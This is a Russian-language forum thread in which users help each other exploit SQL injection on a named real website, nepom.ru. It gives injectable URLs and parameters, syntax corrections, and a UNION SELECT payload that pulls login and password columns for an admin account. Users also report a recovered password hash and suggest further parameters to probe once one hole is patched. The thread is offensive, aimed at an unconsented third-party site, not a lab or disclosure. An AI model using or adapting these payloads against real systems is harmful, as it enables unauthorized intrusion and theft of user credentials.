![]() |
Sql иньекция в nepom.ru
Коротко и ясно уязвимость обнаружел на http://nepom.ru/users/?login=' Далее не могу понять как открыть таблицы Вродебы пишу всё правильно.
Пример http://nepom.ru/users/?login=-1%20UN...ll,null%20FROM w3t Users WHERE U_Username='admin'/* ИТД помогите разобраться.... |
А от куда ты знаешь имена таблиц?
|
1. У тебя неправильный синтаксис: после -1 нужно ставить ', а потом комментировать т.к. в запросе значение взято в кавычки.
2. Ты выбираешь 5 столбцов, когда там нужно всего один. 3. Нет вывода результата, поэтому посмотреть пароль не получится. Поэтому тебе нужно искать другую sql-инъекцию :) Если бы был вывод, правильный запрос был бы вот такой: Цитата:
|
Вот тебе настоящая sql-инъекция! :)
Цитата:
|
Цитата:
Если вам не лень посмотрите может я ошибаюсь... Спасибо! |
Вот так:
Цитата:
|
Ххыхыхыхых хеш 123
|
http://nepom.ru/interest/full.php?id=-1'+UNION+SELECT+1,2,login,id,passwd,6,7,8,9+FROM+u sers+where+login='ChatAdmin'/*
Выполняю данный запрос 1 назад всё работоло сей час что-то не работает видать нашли багу. Ктонить может обьяснить что произошло..... |
багу прикрыли
а http://nepom.ru/users/?login=' еще работает |
лично у меня ваще высветило что страницы full.php нету
попробуй на других страницах типа http://nepom.ru/interest/?raz=1%27 http://nepom.ru/users/?login=%27 |
| Время: 09:22 |